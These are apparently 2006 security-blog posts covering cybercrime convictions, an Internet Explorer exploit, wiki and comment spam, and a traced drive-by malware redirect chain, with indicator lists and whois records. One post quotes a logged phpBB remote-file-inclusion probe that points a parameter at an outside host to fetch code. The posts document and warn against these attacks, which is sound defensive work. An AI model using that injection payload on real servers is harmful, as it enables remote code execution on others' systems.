Three Russians were sentenced to 8 years of hard time for extortion in connection with denial of service attacks.

Anna from Kaspersky told me in June that there was a Russian law that could be used against cybercrime, but that it hadn’t been used so far. That mirrors what they said in their blog yesterday. This is a very important sentence, even if the sentencing reflected the extortion more than the cybercrime.

Other news reports:

Informationweek, Securityfocus

There’s a new vulnerability in Windows, that Microsoft isn’t going to patch until October 10. In the meantime, Webattacker is pushing out exploits for it.

The vulnerability is for Internet Explorer. If you’re using Firefox, you’re safe from that particular vulnerability.

But how many of us have friends, co-workers and family who insists on using Internet Explorer, because it’s familiar?

ZERT has released a patch for the vulnerability, according to Eweek. It also mentions that Gadi Evron, bothunter extraordinaire, is operations manager for ZERT.

I saw some probing of phpBB in my logs. The probes looked like this:
GET /2006/09/14/includes/functions.php?phpbb_root_path=http://somedomain.tld/oki/lol1.txt?

I couldn’t figure it out. Why would they try probing for phpBB where it obviously couldn’t be found? Then it dawned on me - phpBB was in the URL of a post from that day and from 2006/08/07, which was another URL they tried. I since found another outfit probing for the same vulnerability.

Here’s more on that (as it becomes available):

National Vulnerability Database CVE-2006-4780

The code I found in the files they tried to inject - was not innocent. Let’s just put it like that for the time being.

Sunday Times broke a story on stolen identities (credit card details etc) sold on a Russian website.

The website, carder.info, is now offline.

There was an earlier story, and I found a long version of it on an Infosec discussion list.

We’ve had comment spam on here that offered skimmers for sale, and also (if I remember correctly) credit card details.
It’s also interesting to note that only some of the victims of this site knew something was wrong with their computer.

What’s the best way to protect your windows computer while checking risky sites? Like spamvertized sites.

Those who want to study what the malware does, tend to use a virtual machine. Such as VMware. Also check out the Wikipedia article on virtual machines. There’s also something called a Browser Appliance from VMware.

Regular people who just want to protect their computers seem to like Sandboxie.

What do you guys use?

I started out reporting a comment spammer to Intercage. He was spamming from 216.255.190.66.

The spam contained a URL at mytcentral.com, which is at 216.255.185.10.

I checked the URL in my browser, and my anti-virus woke up and nuked a trojan.

So I checked some more. Can’t say for sure I found the infectious stuff, but here’s what I think I found:

There was an advertizing banner at se-v.com (69.50.177.38), which among other things, produced an iframe of one pixel width and height. That one was on
ps500.com (85.255.116.246)

From then on, I found a string of 302 redirects on the same domain: 24hwebsex.com (85.255.116.246), ending up at a very risky looking (nb, I’ve munged it to avoid accidental infections):

http://24hwebsex.com*/demo.php

I tried that URL directly anyway, and got this (blank) URL in return:

http://www.24hwebsex.com*/cgi-bin/ie0606.cgi?type=MS06-006

When I try that with a text browser and redact the type, I get this- munged both code and some detail:

Web-Attacker Control panel

Your IP is: (munged)

Your Browser is: Firefox 1.5.0.6

Your Operation System is: Windows XP

Current Date and Time: 31-Aug-2006 12:8

Please enter the password to access the statistics

FORM action - http://24hwebsex.com*/cgi-bin/ie0606.cgi

INPUT type “password” name “password”

INPUT type “submit” value “Enter”

I found mention of this software at the Bleedingedge forums.

And it might be the same software Sophos wrote about in March. Wikipedia entry.
——————

Whois:

08/31/06 12:22:27 whois mytcentral.com

Registration Service Provided By: ESTDOMAINS INC

Registrant:
none
Serg (serg78@pisem.net)
Lesnay 1-54
Pushkino
msk,687120
RU
Tel. +321.96478521

Creation Date: 21-Feb-2006
Expiration Date: 21-Feb-2007

Domain servers in listed order:
ns15.crybits.com
ns14.crybits.com

08/31/06 12:23:09 whois se-v.com

whois -h whois.estdomains.com se-v.com …
Registration Service Provided By: ANUNAH LLC

Registrant:
N/A
Abdula Khaled-Mamed Dzibah (glac@crybits.com)
Shaytanhasy Obdukurlasy 2
Islamabad
Islamabad,54000
PK
Tel. +763.2784936

Creation Date: 17-Mar-2006
Expiration Date: 17-Mar-2007

Domain servers in listed order:
ns15.crybits.com
ns14.crybits.com

08/31/06 12:21:21 whois ps500.com

Registration Service Provided By: ESTDOMAINS INC

Registrant:
none
Alex Zudov (work@vnukovo.net)
Uralskay 14
Zarechensk
Msk,095437
RU
Tel. +78.63798524

Creation Date: 03-Aug-2006
Expiration Date: 03-Aug-2007

Domain servers in listed order:
ns1.dns-parking.com
ns2.dns-parking.com

08/31/06 12:20:46 whois 24hwebsex.com

Registration Service Provided By: ESTDOMAINS INC

Registrant:
n/a
Alex Ferietko (websex24hour@yahoo.com)
Hrushevsky str 16, ap 26
Ivano-Frankivs
Ivano-Frankivs’ka Oblast’,252033
UA
Tel. +38.0342225216

Creation Date: 16-Jul-2006
Expiration Date: 16-Jul-2007

Domain servers in listed order:
ns2.24hwebsex.com
ns1.24hwebsex.com

Update: Check out the Spamhaus record for 85.255.116.246

I had a visit from a spammer that spams every special page that I’ve never heard of on MediaWiki. Pages with weird names. Pages that didn’t exist, because most of them were talk pages for possibly existing pages. I have no idea how many pages he spammed. More than 30, would be my guess. He also tagged some talk pages for existing users. And he completely filled them with porn links.

So, here’s a short rundown. I’ve got more, but will try to condense it some.

IP addresses used to spam for. Interesting, because the first five I checked, were all Asian:

58.79.206.53
58.226.83.170
58.230.250.23
59.19.214.176
59.21.210.203
59.150.200.40
61.33.174.189
61.35.176.77
61.248.35.110
67.15.42.29
124.49.135.22
124.61.111.177
163.180.200.211
165.229.48.30
194.117.134.196
202.54.61.99
203.81.136.101
203.236.103.196
210.91.187.248
210.92.103.94
210.92.158.98
211.38.113.101
211.38.191.144
211.50.92.91
211.104.149.173
211.113.213.132
211.178.129.104
211.195.40.226
211.217.137.77
211.219.6.246
211.221.210.158
211.213.131.228
218.25.163.18
218.52.58.26
218.108.24.117
218.145.101.210
218.152.81.57
218.209.42.100
218.209.208.189
219.238.187.3
219.248.66.109
220.3.92.45
220.72.163.175
220.87.148.37
220.124.118.210
220.124.234.54
220.231.30.34
221.149.59.96
221.153.11.138
221.165.123.131
221.165.193.67
222.108.150.107
222.118.179.165
222.111.167.19
The spamvertized domains were:

1domiks.org
1ebalo.org
1foleks.org
1golod.org
1hrens.org
1ibanusiks.org
1jolla.org

IP addresses of webhosts:

74.52.17.161
74.52.17.162
74.52.17.163

The pages all had iframes that showed an affiliate page at 100 % og width and 5000 pixels height.

Affiliate: yourfreevids.com id=751

These e-mail addresses were used:

krun@mail333.com
letuns@mail333.com
stoker@mail333.com

Whois info is most likely fake, but here it is, in case someone’s searching for exactly that data:

Registrant Name:Bilanov
Registrant Organization:1dil
Registrant Street1:Vore 67543
Registrant City:Blin
Registrant State/Province:0
Registrant Postal Code:15478
Registrant Country:MX
Registrant Phone:+746.786546786

Registrant Name:Kakauya raznica
Registrant Organization:1hren
Registrant Street1:ddd 15
Registrant City:Fedor city
Registrant State/Province:0
Registrant Postal Code:76454
Registrant Country:BR
Registrant Phone:+764.768456456

Registrant Name:Pizdec komuto
Registrant Organization:Pizdec
Registrant Street1:debilov 98746354
Registrant City:blya
Registrant State/Province:0
Registrant Postal Code:47852
Registrant Country:AR
Registrant Phone:+452.48678654467

——-

I checked Google for the e-mail addresses, and hit paydirt. One of the e-mail addresses had been used to spamvertize a subdomain on dia-host.com January 2005.

The website is no longer active, but the whois is:

DiabloCompany
Diablo (admin@new-incest.com)
Garvard 2-10
Oklahoma
null,655158
ES
Tel. +91.2228797504

I found that exact whois info on coolsearcher.net, which has been found to contain malicious downloads (see the Description pane here). I also found references to new-incest.com at sites warning about CoolWebSearch hijackers.

If you think you may have a trojan on your system, or lots of popups or lots of adware, you can check out this forum:

Castlecop HijackThis forum

HijackThis is a tool that checks what processes your computer is running, and what your browser is bogged down with. Do NOT delete stuff with HijackThis on your own, unless you’re a professional at IT-security! And even then, I know a few IT-consultants who wouldn’t do it on their own… But HijackThis is a wonderful tool for others to help you clean your computer.

BBC NEWS | Technology | Three held over virus e-mail plot

Spamming and virusing in one neat bundle, targetted to businesses.

Heady stuff…

But the important bit was at the end:

He said he hoped the arrests would send a “clear signal” that national borders would not stop the authorities taking action over malicious computer software.

I’ve been reading a Register story about disabling botnets.

The story writer advocates disabling of botnets. Essentially hacking them and shutting them down. But wouldn’t those bots get herded into another botnet pretty quickly? Unless the hole was patched, of course. But machines belonging to people who allow their machines to get infected, would probably get infected with something else pretty quickly.

Would it be possible for anyone who’s good enough to log into a botnet to send a big popup to the computer, telling the owner that it’s infected, and exhorting him/her to do a full reinstall? Maybe a link to an article at a very prestigious site where they could read more?

Just a theory…